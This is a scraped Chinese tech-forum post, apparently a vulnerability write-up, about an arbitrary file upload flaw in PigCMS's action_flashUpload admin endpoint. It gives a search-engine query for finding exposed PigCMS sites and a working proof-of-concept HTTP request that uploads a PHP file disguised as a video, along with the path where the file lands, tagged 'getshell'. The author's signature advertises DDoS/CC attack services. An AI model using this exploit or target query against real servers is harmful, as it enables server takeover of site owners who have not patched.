登录
/
注册
首页
论坛
其它
首页
科技
业界
安全
程序
广播
Follow
关于
导读
排行榜
资讯
发帖说明
登录
/
注册
账号
自动登录
找回密码
密码
登录
立即注册
搜索
搜索
关闭
CSDN热搜
程序园
精品问答
技术交流
资源下载
本版
帖子
用户
软件
问答
教程
代码
写记录
写博客
小组
VIP申请
VIP网盘
网盘
联系我们
发帖说明
道具
勋章
任务
淘帖
动态
分享
留言板
导读
设置
我的收藏
退出
腾讯QQ
微信登录
返回列表
首页
›
资源区
›
程序
›
PigCMS action_flashUpload 任意文件上传漏洞
漏洞分析
PigCMS action_flashUpload 任意文件上传漏洞
[ 复制链接 ]
anyue1937
2025-10-15 20:07:52
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
## 漏洞描述
PigCMS action_flashUpload 方法中存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件获取到服务器权限
## 漏洞影响
pigcms
## 网络测绘
```app.name="PigCMS"```
## 漏洞复现
登陆页面

验证POC
```POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload HTTP/1.1Host:Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=----aaa
------aaaContent-Disposition: form-data; name="filePath"; filename="test.php"Content-Type: video/x-flv
<?php phpinfo();?>------aaa```

```/cms/upload/images/2025/08/11/1691722887xXbx.php```
渗透
漏洞
getshell
相关帖子
CmsEasy crossall_act.php SQL注入漏洞
Dc-3靶机渗透
DC-4靶机渗透
AI辅助渗透测试小试牛刀
漏洞解析--文件包含漏洞(含漏洞复现)
wepoc Nuclei 漏洞扫描器图形界面工具
MySQL8总被扫出漏洞,不想升级该怎么办呢?看我如何应对的
Strix:用AI做渗透测试,把安全漏洞扼杀在开发阶段
DC-01靶场渗透
pgAdmin 后台命令执行漏洞复现及分析(CVE-2025-2945)
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
相关推荐
程序
CmsEasy crossall_act.php SQL注入漏洞
7
165
anyue1937
2025-10-15
业界
Dc-3靶机渗透
1
635
骂治并
2025-10-17
科技
DC-4靶机渗透
1
59
缢闸
2025-10-26
科技
AI辅助渗透测试小试牛刀
0
116
尚腱埂
2025-10-29
业界
漏洞解析--文件包含漏洞(含漏洞复现)
8
647
能杜孱
2025-11-05
安全
wepoc Nuclei 漏洞扫描器图形界面工具
5
1051
痕厄
2025-11-06
业界
MySQL8总被扫出漏洞,不想升级该怎么办呢?看我如何应对的
1
310
倡遍竽
2025-11-07
业界
Strix:用AI做渗透测试,把安全漏洞扼杀在开发阶段
2
515
叟澡帅
2025-11-12
安全
DC-01靶场渗透
2
925
姨番单
2025-11-23
安全
pgAdmin 后台命令执行漏洞复现及分析(CVE-2025-2945)
0
242
赘暨逢
2025-12-17
回复
(2)
映各
2025-10-31 03:02:59
回复
使用道具
举报
照妖镜
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
感谢分享,学习下。
喳谍
2025-11-25 20:37:34
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
懂技术并乐意极积无私分享的人越来越少。珍惜
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
回复
本版积分规则
回帖并转播
回帖后跳转到最后一页
浏览过的版块
业界
安全
签约作者
程序园优秀签约作者
发帖
anyue1937
2025-11-25 20:37:34
关注
0
粉丝关注
3
主题发布
板块介绍填写区域,请于后台编辑
财富榜{圆}
3934307807
991124
anyue1937
9994891
kk14977
6845357
4
xiangqian
638210
5
韶又彤
9997
6
宋子
9982
7
闰咄阅
9993
8
刎唇
9993
9
俞瑛瑶
9998
10
蓬森莉
9951
查看更多
今日好文热榜
877
精选 8 个 .NET 开发实用的类库,效率提升
74
精选 8 个 .NET 开发实用的类库,效率提升
564
精选 8 个 .NET 开发实用的类库,效率提升
134
精选 8 个 .NET 开发实用的类库,效率提升
106
精选 8 个 .NET 开发实用的类库,效率提升
606
alist如何将默认布局设置为图片布局
1011
Kali2025.4+Cherry Studio一键配置HexStrik
419
PHP 之高级面向对象编程 深入理解设计模式
416
PHP 之高级面向对象编程 深入理解设计模式
572
升级curl版本,及升级后引起的动态库链接不
294
2025年GEO优化服务商全景对比:五大核心维
779
AI Agent详解
983
Buildah 简明教程:让镜像构建更轻量,告别
610
OceanBase 在滴滴大规模运维经验以及新功能
975
[CSS+]HTML Learn Data Day 2
96
掌握相关性分析:读懂数据间的“悄悄话”
138
嵌入式UI框架-抗锯齿画圆弧算法
935
嵌入式UI框架的渐变原理、渐变算法
220
日本股票 API 对接实战指南(实时行情与 IP
563
解决Docker磁盘空间告急:认识并清理“悬空